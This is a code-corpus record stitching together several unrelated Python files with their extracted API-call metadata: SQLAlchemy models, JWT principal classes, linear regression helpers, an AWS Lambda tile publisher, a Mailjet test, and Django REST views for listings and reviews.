] | [((200, 218), 'sqlalchemy.ext.declarative.declarative_base', 'declarative_base', ([], {}), '()\n', (216, 218), False, 'from sqlalchemy.ext.declarative import declarative_base\n'), ((1672, 1713), 'sqlalchemy.create_engine', 'create_engine', (['"""sqlite:///supermarket.db"""'], {}), "('sqlite:///supermarket.db')\n", (1685, 1713), False, 'from sqlalchemy import create_engine\n'), ((276, 309), 'sqlalchemy.Column', 'Column', (['Integer'], {'primary_key': '(True)'}), '(Integer, primary_key=True)\n', (282, 309), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((545, 578), 'sqlalchemy.Column', 'Column', (['Integer'], {'primary_key': '(True)'}), '(Integer, primary_key=True)\n', (551, 578), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((774, 792), 'sqlalchemy.orm.relationship', 'relationship', (['User'], {}), '(User)\n', (786, 792), False, 'from sqlalchemy.orm import relationship\n'), ((1057, 1090), 'sqlalchemy.Column', 'Column', (['Integer'], {'primary_key': '(True)'}), '(Integer, primary_key=True)\n', (1063, 1090), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((1320, 1345), 'sqlalchemy.orm.relationship', 'relationship', (['Supermarket'], {}), '(Supermarket)\n', (1332, 1345), False, 'from sqlalchemy.orm import relationship\n'), ((1410, 1428), 'sqlalchemy.orm.relationship', 'relationship', (['User'], {}), '(User)\n', (1422, 1428), False, 'from sqlalchemy.orm import relationship\n'), ((328, 339), 'sqlalchemy.String', 'String', (['(250)'], {}), '(250)\n', (334, 339), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((376, 387), 'sqlalchemy.String', 'String', (['(250)'], {}), '(250)\n', (382, 387), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((427, 438), 'sqlalchemy.String', 'String', (['(250)'], {}), '(250)\n', (433, 438), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((461, 472), 'sqlalchemy.String', 'String', 
(['(250)'], {}), '(250)\n', (467, 472), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((597, 608), 'sqlalchemy.String', 'String', (['(250)'], {}), '(250)\n', (603, 608), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((647, 658), 'sqlalchemy.String', 'String', (['(250)'], {}), '(250)\n', (653, 658), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((697, 708), 'sqlalchemy.String', 'String', (['(250)'], {}), '(250)\n', (703, 708), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((740, 761), 'sqlalchemy.ForeignKey', 'ForeignKey', (['"""user.id"""'], {}), "('user.id')\n", (750, 761), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((1109, 1119), 'sqlalchemy.String', 'String', (['(80)'], {}), '(80)\n', (1115, 1119), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((1158, 1169), 'sqlalchemy.String', 'String', (['(250)'], {}), '(250)\n', (1164, 1169), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((1190, 1199), 'sqlalchemy.String', 'String', (['(8)'], {}), '(8)\n', (1196, 1199), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((1222, 1233), 'sqlalchemy.String', 'String', (['(250)'], {}), '(250)\n', (1228, 1233), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((1272, 1300), 'sqlalchemy.ForeignKey', 'ForeignKey', (['"""supermarket.id"""'], {}), "('supermarket.id')\n", (1282, 1300), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n'), ((1376, 1397), 'sqlalchemy.ForeignKey', 'ForeignKey', (['"""user.id"""'], {}), "('user.id')\n", (1386, 1397), False, 'from sqlalchemy import Column, ForeignKey, Integer, String\n')] |
from itsdangerous import TimedJSONWebSignatureSerializer, \
JSONWebSignatureSerializer
from nanohttp import settings, context, HTTPForbidden
class BaseJWTPrincipal:
    """Base class for JWT-backed identities.

    Wraps a claims `payload` dict and knows how to serialize it to / load it
    from a signed token. Subclasses must implement `get_config()` to provide
    the secret, algorithm and max_age settings.
    """

    def __init__(self, payload):
        self.payload = payload

    @classmethod
    def create_serializer(cls, force=False, max_age=None):
        """Build the itsdangerous serializer for this principal.

        With force=True an untimed serializer is returned (signature checked
        but expiry ignored); otherwise a timed one that expires after
        `max_age` (falling back to the configured max_age).
        """
        config = cls.get_config()
        if force:
            return JSONWebSignatureSerializer(
                config['secret'],
                algorithm_name=config['algorithm']
            )
        else:
            return TimedJSONWebSignatureSerializer(
                config['secret'],
                expires_in=max_age or config['max_age'],
                algorithm_name=config['algorithm']
            )

    def dump(self, max_age=None):
        """Serialize the payload into a signed (timed) token."""
        return self.create_serializer(max_age=max_age).dumps(self.payload)

    @classmethod
    def load(cls, encoded, force=False):
        """Decode a token (optionally prefixed with 'Bearer ') into a principal.

        Raises itsdangerous' BadSignature/SignatureExpired on invalid input.
        """
        if encoded.startswith('Bearer '):
            encoded = encoded[7:]

        payload = cls.create_serializer(force=force).loads(encoded)
        return cls(payload)

    @classmethod
    def get_config(cls):
        """Return the JWT settings dict; must be overridden by subclasses."""
        raise NotImplementedError()
class JWTPrincipal(BaseJWTPrincipal):
def is_in_roles(self, *roles):
if 'roles' in self.payload:
if set(self.payload['roles']).intersection(roles):
return True
return False
def assert_roles(self, *roles):
"""
.. versionadded:: 0.29
:param roles:
:return:
"""
if roles and not self.is_in_roles(*roles):
raise HTTPForbidden()
@property
def email(self):
return self.payload.get('email')
@property
def session_id(self):
return self.payload.get('sessionId')
@property
def id(self):
return self.payload.get('id')
@property
def roles(self):
return self.payload.get('roles', [])
@classmethod
def get_config(cls):
"""
Warning! Returned value is a dict, so it's mutable. If you modify this
value, default config of the whole project will be changed and it may
cause unpredictable problems.
"""
return settings.jwt
class JWTRefreshToken:
def __init__(self, payload):
self.payload = payload
@classmethod
def create_serializer(cls):
return TimedJSONWebSignatureSerializer(
settings.jwt.refresh_token.secret,
expires_in=settings.jwt.refresh_token.max_age,
algorithm_name=settings.jwt.refresh_token.algorithm
)
def dump(self):
return self.create_serializer().dumps(self.payload)
@classmethod
def load(cls, encoded):
payload = cls.create_serializer().loads(encoded)
return cls(payload)
@property
def id(self):
return self.payload.get('id')
class DummyIdentity(JWTPrincipal):
def __init__(self, *roles):
super().__init__({'roles': list(roles)})
class ImpersonateAs:
backup_identity = None
def __init__(self, principal):
self.principal = principal
def __enter__(self):
if hasattr(context, 'identity'):
self.backup_identity = context.identity
context.identity = self.principal
def __exit__(self, exc_type, exc_val, exc_tb):
context.identity = self.backup_identity
| [
"itsdangerous.JSONWebSignatureSerializer",
"nanohttp.HTTPForbidden",
"itsdangerous.TimedJSONWebSignatureSerializer"
] | [((2352, 2527), 'itsdangerous.TimedJSONWebSignatureSerializer', 'TimedJSONWebSignatureSerializer', (['settings.jwt.refresh_token.secret'], {'expires_in': 'settings.jwt.refresh_token.max_age', 'algorithm_name': 'settings.jwt.refresh_token.algorithm'}), '(settings.jwt.refresh_token.secret,\n expires_in=settings.jwt.refresh_token.max_age, algorithm_name=settings.\n jwt.refresh_token.algorithm)\n', (2383, 2527), False, 'from itsdangerous import TimedJSONWebSignatureSerializer, JSONWebSignatureSerializer\n'), ((384, 469), 'itsdangerous.JSONWebSignatureSerializer', 'JSONWebSignatureSerializer', (["config['secret']"], {'algorithm_name': "config['algorithm']"}), "(config['secret'], algorithm_name=config['algorithm']\n )\n", (410, 469), False, 'from itsdangerous import TimedJSONWebSignatureSerializer, JSONWebSignatureSerializer\n'), ((544, 674), 'itsdangerous.TimedJSONWebSignatureSerializer', 'TimedJSONWebSignatureSerializer', (["config['secret']"], {'expires_in': "(max_age or config['max_age'])", 'algorithm_name': "config['algorithm']"}), "(config['secret'], expires_in=max_age or\n config['max_age'], algorithm_name=config['algorithm'])\n", (575, 674), False, 'from itsdangerous import TimedJSONWebSignatureSerializer, JSONWebSignatureSerializer\n'), ((1577, 1592), 'nanohttp.HTTPForbidden', 'HTTPForbidden', ([], {}), '()\n', (1590, 1592), False, 'from nanohttp import settings, context, HTTPForbidden\n')] |
import numpy as np
import matplotlib.pyplot as plt
import math
TIME_SLEEP = 0.000000001
def train_sgd(X, y, alpha, w=None):
"""Trains a linear regression model using stochastic gradient descent.
Parameters
----------
X : numpy.ndarray
Numpy array of data
y : numpy.ndarray
Numpy array of outputs. Dimensions are n * 1, where n is the number of rows
in `X`.
alpha : float
Describes the learning rate.
w : numpy.ndarray, optional
The initial w vector (the default is zero).
Returns
-------
w : numpy.ndarray
Trained vector with dimensions (m + 1) * 1, where m is the number of
columns in `X`.
"""
X_b = np.hstack((np.ones((X.shape[0], 1)), X))
previous_error = -1
error = -1
stop = False
num_iters = 0
if w is None:
w = np.zeros((x.shape[1] + 1, 1))
while not stop:
for i in range(0, len(X)):
w = w - alpha / len(X) * (np.dot(np.transpose(w),
X_b[i].reshape(X_b.shape[1], 1)) -
y[i]) * X_b[i].reshape(X_b.shape[1], 1)
error = evaluate_error(X, y, w)
if previous_error == -1:
previous_error = error
elif (math.fabs(error - previous_error) < 0.01 * previous_error and
num_iters > 10000):
stop = True
break
previous_error = error
num_iters += 1
return w
def train(X, y):
"""Trains a linear regression model using linear algebra.
Parameters
----------
X : numpy.ndarray
Numpy array of data
y : numpy.ndarray
Numpy array of outputs. Dimensions are n * 1, where n is the number of rows
in `X`.
Returns
-------
w : numpy.ndarray
Trained vector with dimensions (m + 1) * 1, where m is the number of
columns in `X`.
"""
# Add bias term
X_b = np.hstack((np.ones((X.shape[0], 1)), X))
# Compute pseudo-inverse
X_inverse = (np.linalg.inv(np.transpose(X_b).dot(X_b)).dot(
np.transpose(X_b)))
# Compute w
w = X_inverse.dot(y)
return w
# Plot data
def plot(X, y, w):
"""Plot X data, the actual y output, and the prediction line.
Parameters
----------
X : numpy.ndarray
Numpy array of data with 1 column.
y : numpy.ndarray
Numpy array of outputs. Dimensions are n * 1, where n is the number of
rows in `X`.
w : numpy.ndarray
Numpy array with dimensions 2 * 1.
"""
X_b = np.hstack((np.ones((X.shape[0], 1)), X))
y_predict = X_b.dot(w)
plt.clf()
plt.plot(X[:, 0], y_predict, 'r-', X[:, 0], y, 'o')
plt.pause(TIME_SLEEP)
def init_plot(figsize=(15, 8)):
"""Initializes the plot.
Parameters
----------
figsize : tuple, optional
A tuple containing the width and height of the plot (the default is
(15, 8)).
"""
plt.ion()
f = plt.figure(figsize=figsize)
plt.show()
def evaluate_error(X, y, w):
"""Returns the mean squared error.
X : numpy.ndarray
Numpy array of data.
y : numpy.ndarray
Numpy array of outputs. Dimensions are n * 1, where n is the number of
rows in `X`.
w : numpy.ndarray
Numpy array with dimensions (m + 1) * 1, where m is the number of
columns in `X`.
Returns
-------
float
The mean squared error
"""
X_b = np.hstack((np.ones((X.shape[0], 1)), X))
y_predict = X_b.dot(w)
dist = (y - y_predict) ** 2
return float(np.sum(dist)) / X.shape[0]
def predict(X, w):
"""Returns the prediction for one data point.
Parameters
----------
X : numpy.ndarray
Numpy array of data
w : numpy.ndarray
Numpy array with dimensions (m + 1) * 1, where m is the number of
columns in `X`.
Returns
-------
float
The mean squared error
"""
X_b = np.hstack((np.ones((X.shape[0], 1)), X))
return X_b.dot(w)
| [
"numpy.ones",
"matplotlib.pyplot.show",
"matplotlib.pyplot.clf",
"matplotlib.pyplot.plot",
"numpy.sum",
"matplotlib.pyplot.figure",
"numpy.zeros",
"math.fabs",
"matplotlib.pyplot.pause",
"numpy.transpose",
"matplotlib.pyplot.ion"
] | [((2701, 2710), 'matplotlib.pyplot.clf', 'plt.clf', ([], {}), '()\n', (2708, 2710), True, 'import matplotlib.pyplot as plt\n'), ((2715, 2766), 'matplotlib.pyplot.plot', 'plt.plot', (['X[:, 0]', 'y_predict', '"""r-"""', 'X[:, 0]', 'y', '"""o"""'], {}), "(X[:, 0], y_predict, 'r-', X[:, 0], y, 'o')\n", (2723, 2766), True, 'import matplotlib.pyplot as plt\n'), ((2771, 2792), 'matplotlib.pyplot.pause', 'plt.pause', (['TIME_SLEEP'], {}), '(TIME_SLEEP)\n', (2780, 2792), True, 'import matplotlib.pyplot as plt\n'), ((3024, 3033), 'matplotlib.pyplot.ion', 'plt.ion', ([], {}), '()\n', (3031, 3033), True, 'import matplotlib.pyplot as plt\n'), ((3042, 3069), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'figsize'}), '(figsize=figsize)\n', (3052, 3069), True, 'import matplotlib.pyplot as plt\n'), ((3074, 3084), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3082, 3084), True, 'import matplotlib.pyplot as plt\n'), ((860, 889), 'numpy.zeros', 'np.zeros', (['(x.shape[1] + 1, 1)'], {}), '((x.shape[1] + 1, 1))\n', (868, 889), True, 'import numpy as np\n'), ((2149, 2166), 'numpy.transpose', 'np.transpose', (['X_b'], {}), '(X_b)\n', (2161, 2166), True, 'import numpy as np\n'), ((723, 747), 'numpy.ones', 'np.ones', (['(X.shape[0], 1)'], {}), '((X.shape[0], 1))\n', (730, 747), True, 'import numpy as np\n'), ((2008, 2032), 'numpy.ones', 'np.ones', (['(X.shape[0], 1)'], {}), '((X.shape[0], 1))\n', (2015, 2032), True, 'import numpy as np\n'), ((2638, 2662), 'numpy.ones', 'np.ones', (['(X.shape[0], 1)'], {}), '((X.shape[0], 1))\n', (2645, 2662), True, 'import numpy as np\n'), ((3546, 3570), 'numpy.ones', 'np.ones', (['(X.shape[0], 1)'], {}), '((X.shape[0], 1))\n', (3553, 3570), True, 'import numpy as np\n'), ((3653, 3665), 'numpy.sum', 'np.sum', (['dist'], {}), '(dist)\n', (3659, 3665), True, 'import numpy as np\n'), ((4048, 4072), 'numpy.ones', 'np.ones', (['(X.shape[0], 1)'], {}), '((X.shape[0], 1))\n', (4055, 4072), True, 'import numpy as np\n'), ((1298, 1331), 
'math.fabs', 'math.fabs', (['(error - previous_error)'], {}), '(error - previous_error)\n', (1307, 1331), False, 'import math\n'), ((2099, 2116), 'numpy.transpose', 'np.transpose', (['X_b'], {}), '(X_b)\n', (2111, 2116), True, 'import numpy as np\n'), ((991, 1006), 'numpy.transpose', 'np.transpose', (['w'], {}), '(w)\n', (1003, 1006), True, 'import numpy as np\n')] |
import boto3
import json
import math
import logging
import base64
from concurrent.futures import ThreadPoolExecutor
from .storyhtml import create_story_html
from .convert import convert_to_exhibit
import time
class StoryPublisher:
def __init__(
self,
bucket,
get_image_lambda_name,
render_tile_lambda_name,
render_group_lambda_name,
):
self.bucket = bucket
self.lambda_client = boto3.client("lambda")
self.s3_client = boto3.client("s3")
self.get_image_lambda_name = get_image_lambda_name
self.render_tile_lambda_name = render_tile_lambda_name
self.render_group_lambda_name = render_group_lambda_name
self.metadata = None
self.image = None
def publish(self, story, user_uuid, minerva_browser_url, render_images=True):
logging.info(
"Publishing story uuid=%s render_images=%s", story["uuid"], render_images
)
self._load_image(user_uuid, story["imageUuid"])
self._create_story(story, minerva_browser_url)
if render_images:
self._render_tiles(story, user_uuid)
def get_published_status(self, story_uuid):
res = self.s3_client.list_objects(Bucket=self.bucket, Prefix=story_uuid)
if "Contents" not in res:
return "unpublished"
res = self.s3_client.list_objects(
Bucket=self.bucket, Prefix=f"{story_uuid}/log"
)
if "Contents" in res:
for item in res["Contents"]:
if "SUCCESS" in item["Key"]:
return "published"
if "FAILURE" in item["Key"]:
return "failure"
return "processing"
def _load_image(self, user_uuid, image_uuid):
body = self._get_image(user_uuid, image_uuid)
self.metadata = body["data"]
self.image = body["included"]["images"][0]
def _create_story(self, story, minerva_browser_url):
print("Creating story")
story_uuid = story["uuid"]
img = {
"width": self.metadata["pixels"]["SizeX"],
"height": self.metadata["pixels"]["SizeY"],
"pyramid_levels": self.image["pyramid_levels"],
}
story_json = json.dumps(convert_to_exhibit(story, img, self.bucket))
html = create_story_html(story_json, minerva_browser_url)
key = f"{story_uuid}/minerva-story/index.html"
self.s3_client.put_object(
Body=html, Bucket=self.bucket, Key=key, ContentType="text/html"
)
try:
key = f"{story_uuid}/minerva-story/favicon.png"
self.s3_client.upload_file(
"images/favicon.png", Bucket=self.bucket, Key=key
)
except Exception as e:
print(e)
def _render_tiles(self, story, user_uuid):
print("Rendering tiles")
img = {
"uuid": story["imageUuid"],
"width": self.metadata["pixels"]["SizeX"],
"height": self.metadata["pixels"]["SizeY"],
"pyramid_levels": self.image["pyramid_levels"],
"tile_size": self.image["tile_size"],
}
# Maximum timeout for lambda is 15min. To prevent rendering from timeouting,
# we execute each group in a separate lambda run.
for group in story["groups"]:
self._start_render_lambda(
group, img, user_uuid, story["sample_info"]["name"], story["uuid"]
)
def _start_render_lambda(self, group, img, user_uuid, sample_name, story_uuid):
payload = {
"group": group,
"image": img,
"user_uuid": user_uuid,
"sample_name": sample_name,
"story_uuid": story_uuid,
}
res = self.lambda_client.invoke(
FunctionName=self.render_group_lambda_name,
InvocationType="Event",
Payload=json.dumps(payload),
)
if res["StatusCode"] not in [200, 202, 204]:
print(res)
raise Exception("Error in invoking lambda publishGroupInternal")
def render_group(self, context, group, image, user_uuid, sample_name, story_uuid):
start_time = time.time()
num_tiles = 0
channels = group["channels"]
channel_params = [
f"{channel['id']},{channel['color']},{channel['min']},{channel['max']}"
for channel in channels
]
channel_params = "/".join(channel_params)
group_label = group["label"]
channel_labels = [
f"{channel['id']}__{channel['label']}" for channel in channels
]
channel_labels = "--".join(channel_labels)
group_key = f"{group_label}_{channel_labels}"
group_key = group_key.replace(" ", "-")
logging.info("Rendering channel group %s", group_key)
tiles_x = math.ceil(image["width"] / image["tile_size"])
tiles_y = math.ceil(image["height"] / image["tile_size"])
executor = ThreadPoolExecutor(max_workers=15)
pyramid = []
for number in range(image["pyramid_levels"]):
pyramid.append({"tiles_x": tiles_x, "tiles_y": tiles_y, "number": number})
tiles_x = math.ceil(tiles_x / 2)
tiles_y = math.ceil(tiles_y / 2)
# Render highest pyramid levels (lowest detail) first, in that way the user can
# open the story faster and see the image.
for level in reversed(pyramid):
logging.info("Level %s", level["number"])
for x in range(level["tiles_x"]):
for y in range(level["tiles_y"]):
num_tiles += 1
executor.submit(
self._render_and_upload,
user_uuid,
image["uuid"],
x,
y,
0,
0,
level["number"],
channel_params,
story_uuid,
group_key,
sample_name,
)
if context.get_remaining_time_in_millis() < 1000:
run_time = time.time() - start_time
self._mark_group_success(
False, story_uuid, group["label"], run_time, num_tiles
)
executor.shutdown()
run_time = time.time() - start_time
self._mark_group_success(True, story_uuid, group["label"], run_time, num_tiles)
def _render_and_upload(
self,
user_uuid,
image_uuid,
x,
y,
z,
t,
level,
channel_params,
story_uuid,
group_label,
sample_name,
):
logging.info("x=%s y=%s ", x, y)
tile_img = self._render_tile(
user_uuid, image_uuid, x, y, z, t, level, channel_params
)
key = f"{story_uuid}/minerva-story/images/{sample_name}/{group_label}/{level}_{x}_{y}.jpg"
self.s3_client.put_object(Body=tile_img, Bucket=self.bucket, Key=key)
def _mark_group_success(self, success, story_uuid, group_name, run_time, num_tiles):
status = "SUCCESS" if success else "FAILURE"
key = f"{story_uuid}/log/publishGroupInternal_{status}_{group_name}.json"
marker = {
"group": group_name,
"success": success,
"duration": run_time,
"tiles": num_tiles,
}
self.s3_client.put_object(Body=json.dumps(marker), Bucket=self.bucket, Key=key)
def _get_image(self, user_uuid, image_uuid):
payload = {
"pathParameters": {"uuid": image_uuid},
"requestContext": {
"authorizer": {"claims": {"cognito:username": user_uuid}}
},
"headers": {"Accept": "image/jpeg"},
}
res = self.lambda_client.invoke(
FunctionName=self.get_image_lambda_name, Payload=json.dumps(payload)
)
data = json.loads(res["Payload"].read())
body = json.loads(data["body"])
return body
def _render_tile(self, user_uuid, uuid, x, y, z, t, level, channels):
payload = {
"pathParameters": {
"uuid": uuid,
"x": x,
"y": y,
"z": z,
"t": t,
"level": level,
"channels": channels,
},
"queryStringParameters": {"gamma": "1"},
"requestContext": {
"authorizer": {"claims": {"cognito:username": user_uuid}}
},
"headers": {"Accept": "image/jpeg"},
}
res = self.lambda_client.invoke(
FunctionName=self.render_tile_lambda_name, Payload=json.dumps(payload)
)
data = res["Payload"].read()
body = json.loads(data)["body"]
return base64.b64decode(body)
| [
"json.loads",
"math.ceil",
"boto3.client",
"concurrent.futures.ThreadPoolExecutor",
"json.dumps",
"base64.b64decode",
"time.time",
"logging.info"
] | [((444, 466), 'boto3.client', 'boto3.client', (['"""lambda"""'], {}), "('lambda')\n", (456, 466), False, 'import boto3\n'), ((492, 510), 'boto3.client', 'boto3.client', (['"""s3"""'], {}), "('s3')\n", (504, 510), False, 'import boto3\n'), ((844, 935), 'logging.info', 'logging.info', (['"""Publishing story uuid=%s render_images=%s"""', "story['uuid']", 'render_images'], {}), "('Publishing story uuid=%s render_images=%s', story['uuid'],\n render_images)\n", (856, 935), False, 'import logging\n'), ((4213, 4224), 'time.time', 'time.time', ([], {}), '()\n', (4222, 4224), False, 'import time\n'), ((4803, 4856), 'logging.info', 'logging.info', (['"""Rendering channel group %s"""', 'group_key'], {}), "('Rendering channel group %s', group_key)\n", (4815, 4856), False, 'import logging\n'), ((4875, 4921), 'math.ceil', 'math.ceil', (["(image['width'] / image['tile_size'])"], {}), "(image['width'] / image['tile_size'])\n", (4884, 4921), False, 'import math\n'), ((4940, 4987), 'math.ceil', 'math.ceil', (["(image['height'] / image['tile_size'])"], {}), "(image['height'] / image['tile_size'])\n", (4949, 4987), False, 'import math\n'), ((5008, 5042), 'concurrent.futures.ThreadPoolExecutor', 'ThreadPoolExecutor', ([], {'max_workers': '(15)'}), '(max_workers=15)\n', (5026, 5042), False, 'from concurrent.futures import ThreadPoolExecutor\n'), ((6832, 6864), 'logging.info', 'logging.info', (['"""x=%s y=%s """', 'x', 'y'], {}), "('x=%s y=%s ', x, y)\n", (6844, 6864), False, 'import logging\n'), ((8130, 8154), 'json.loads', 'json.loads', (["data['body']"], {}), "(data['body'])\n", (8140, 8154), False, 'import json\n'), ((8972, 8994), 'base64.b64decode', 'base64.b64decode', (['body'], {}), '(body)\n', (8988, 8994), False, 'import base64\n'), ((5227, 5249), 'math.ceil', 'math.ceil', (['(tiles_x / 2)'], {}), '(tiles_x / 2)\n', (5236, 5249), False, 'import math\n'), ((5272, 5294), 'math.ceil', 'math.ceil', (['(tiles_y / 2)'], {}), '(tiles_y / 2)\n', (5281, 5294), False, 'import math\n'), 
((5487, 5528), 'logging.info', 'logging.info', (['"""Level %s"""', "level['number']"], {}), "('Level %s', level['number'])\n", (5499, 5528), False, 'import logging\n'), ((6477, 6488), 'time.time', 'time.time', ([], {}), '()\n', (6486, 6488), False, 'import time\n'), ((8932, 8948), 'json.loads', 'json.loads', (['data'], {}), '(data)\n', (8942, 8948), False, 'import json\n'), ((3920, 3939), 'json.dumps', 'json.dumps', (['payload'], {}), '(payload)\n', (3930, 3939), False, 'import json\n'), ((7583, 7601), 'json.dumps', 'json.dumps', (['marker'], {}), '(marker)\n', (7593, 7601), False, 'import json\n'), ((8036, 8055), 'json.dumps', 'json.dumps', (['payload'], {}), '(payload)\n', (8046, 8055), False, 'import json\n'), ((8850, 8869), 'json.dumps', 'json.dumps', (['payload'], {}), '(payload)\n', (8860, 8869), False, 'import json\n'), ((6245, 6256), 'time.time', 'time.time', ([], {}), '()\n', (6254, 6256), False, 'import time\n')] |
from setuptools import setup
from Cython.Build import cythonize
setup(ext_modules=cythonize('bfsHash.pyx')) | [
"Cython.Build.cythonize"
] | [((83, 107), 'Cython.Build.cythonize', 'cythonize', (['"""bfsHash.pyx"""'], {}), "('bfsHash.pyx')\n", (92, 107), False, 'from Cython.Build import cythonize\n')] |
import os
import sys
sys.path.append("../instock_notifier")
import config
from mailjet_rest import Client
mailjet = Client(auth=(config.SMTP_API_KEY, config.SMTP_API_SECRET), version="v3.1")
data = {
"Messages": [
{
"From": config.EMAIL_SENDER,
"To": config.EMAIL_RECIPIENTS,
"Subject": "Greetings from Mailjet.",
"TextPart": "My first Mailjet email",
"HTMLPart": "<h3>Dear passenger 1, welcome to <a href='https://www.mailjet.com/'>Mailjet</a>!</h3><br />May the delivery force be with you!",
"CustomID": "AppGettingStartedTest"
}
]
}
result = mailjet.send.create(data=data)
print(result.status_code)
print(result.json()) | [
"mailjet_rest.Client",
"sys.path.append"
] | [((23, 61), 'sys.path.append', 'sys.path.append', (['"""../instock_notifier"""'], {}), "('../instock_notifier')\n", (38, 61), False, 'import sys\n'), ((127, 201), 'mailjet_rest.Client', 'Client', ([], {'auth': '(config.SMTP_API_KEY, config.SMTP_API_SECRET)', 'version': '"""v3.1"""'}), "(auth=(config.SMTP_API_KEY, config.SMTP_API_SECRET), version='v3.1')\n", (133, 201), False, 'from mailjet_rest import Client\n')] |
"""
Listing Views
"""
import logging
import operator
from django.shortcuts import get_object_or_404
from django.db.models import Min
from django.db.models.functions import Lower
from rest_framework import filters
from rest_framework import status
from rest_framework import viewsets
from rest_framework.response import Response
from rest_framework.decorators import list_route
from ozpcenter import errors
from ozpcenter import pagination
from ozpcenter import permissions
from ozpcenter.pipe import pipes
from ozpcenter.pipe import pipeline
from ozpcenter.recommend import recommend_utils
import ozpcenter.api.listing.model_access as model_access
import ozpcenter.api.listing.serializers as serializers
import ozpcenter.model_access as generic_model_access
import ozpcenter.api.listing.model_access_es as model_access_es
logger = logging.getLogger('ozp-center.' + str(__name__))
class DocUrlViewSet(viewsets.ModelViewSet):
"""
TODO: Remove?
"""
permission_classes = (permissions.IsUser,)
queryset = model_access.get_all_doc_urls()
serializer_class = serializers.DocUrlSerializer
class ReviewViewSet(viewsets.ModelViewSet):
"""
Reviews for a given listing
The unique_together contraints on models.Review make it difficult to
use the standard Serializer classes (see the Note here:
http://www.django-rest-framework.org/api-guide/serializers/#specifying-read-only-fields)
Primarily for that reason, we forgo using Serializers for POST and PUT
actions
ModelViewSet for getting all Reviews for a given listing
Access Control
===============
- All users can view
URIs
======
GET /api/listing/{pk}/review
Summary:
Find a Review Entry by ID
Response:
200 - Successful operation - ReviewSerializer
DELETE /api/listing/{pk}/review
Summary:
Delete a Review Entry by ID
"""
permission_classes = (permissions.IsUser,)
serializer_class = serializers.ReviewSerializer
filter_backends = (filters.OrderingFilter,)
pagination_class = pagination.ReviewLimitOffsetPagination
ordering_fields = ('id', 'listing', 'text', 'rate', 'edited_date', 'created_date')
ordering = ('-created_date')
def get_queryset(self):
return model_access.get_reviews(self.request.user.username)
def list(self, request, listing_pk=None):
queryset = self.get_queryset().filter(listing=listing_pk, review_parent__isnull=True)
queryset = self.filter_queryset(queryset)
# it appears that because we override the queryset here, we must
# manually invoke the pagination methods
page = self.paginate_queryset(queryset)
if page is not None:
serializer = serializers.ReviewSerializer(page, context={'request': request}, many=True)
return self.get_paginated_response(serializer.data)
serializer = serializers.ReviewSerializer(queryset, many=True, context={'request': request})
return Response(serializer.data)
def retrieve(self, request, pk=None, listing_pk=None):
queryset = self.get_queryset().get(pk=pk, listing=listing_pk)
serializer = serializers.ReviewSerializer(queryset, context={'request': request})
return Response(serializer.data)
def create(self, request, listing_pk=None):
"""
Create a new review
"""
listing = model_access.get_listing_by_id(request.user.username, listing_pk, True)
serializer = serializers.ReviewSerializer(data=request.data, context={'request': request, 'listing': listing}, partial=True)
if not serializer.is_valid():
logger.error('{0!s}'.format(serializer.errors), extra={'request': request})
raise errors.ValidationException('{0}'.format(serializer.errors))
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
def update(self, request, pk=None, listing_pk=None):
"""
Update an existing review
"""
listing = model_access.get_listing_by_id(request.user.username, listing_pk, True)
review = model_access.get_review_by_id(pk)
serializer = serializers.ReviewSerializer(review, data=request.data, context={'request': request, 'listing': listing}, partial=True)
if not serializer.is_valid():
logger.error('{0!s}'.format(serializer.errors), extra={'request': request})
raise errors.ValidationException('{0}'.format(serializer.errors))
serializer.save()
return Response(serializer.data, status=status.HTTP_200_OK)
def destroy(self, request, pk=None, listing_pk=None):
queryset = self.get_queryset()
review = get_object_or_404(queryset, pk=pk)
model_access.delete_listing_review(request.user.username, review)
return Response(status=status.HTTP_204_NO_CONTENT)
class SimilarViewSet(viewsets.ModelViewSet):
"""
Similar Apps for a given listing
# TODO (Rivera 2017-2-22) Implement Similar Listing Algorithm
Primarily for that reason, we forgo using Serializers for POST and PUT
actions
ModelViewSet for getting all Similar Apps for a given listing
Access Control
===============
- All users can view
URIs
======
GET /api/listing/{pk}/similar
Summary:
Find a Similar App Entry by ID
Response:
200 - Successful operation - ListingSerializer
"""
permission_classes = (permissions.IsUser,)
serializer_class = serializers.ListingSerializer
# pagination_class = pagination.StandardPagination
def get_queryset(self, listing_pk):
approval_status = self.request.query_params.get('approval_status', None)
# org = self.request.query_params.get('org', None)
orgs = self.request.query_params.getlist('org', False)
enabled = self.request.query_params.get('enabled', None)
ordering = self.request.query_params.getlist('ordering', None)
if enabled:
enabled = enabled.lower()
if enabled in ['true', '1']:
enabled = True
else:
enabled = False
listings = model_access.get_similar_listings(self.request.user.username, listing_pk)
if approval_status:
listings = listings.filter(approval_status=approval_status)
if orgs:
listings = listings.filter(agency__title__in=orgs)
if enabled is not None:
listings = listings.filter(is_enabled=enabled)
# have to handle this case manually because the ordering includes an app multiple times
# if there are multiple owners. We instead do sorting by case insensitive compare of the
# app owner that comes first alphabetically
param = [s for s in ordering if 'owners__display_name' == s or '-owners__display_name' == s]
if ordering is not None and param:
orderby = 'min'
if param[0].startswith('-'):
orderby = '-min'
listings = listings.annotate(min=Min(Lower('owners__display_name'))).order_by(orderby)
self.ordering = None
return listings
def list(self, request, listing_pk=None):
queryset = self.filter_queryset(self.get_queryset(listing_pk))
serializer = serializers.ListingSerializer(queryset, context={'request': request}, many=True)
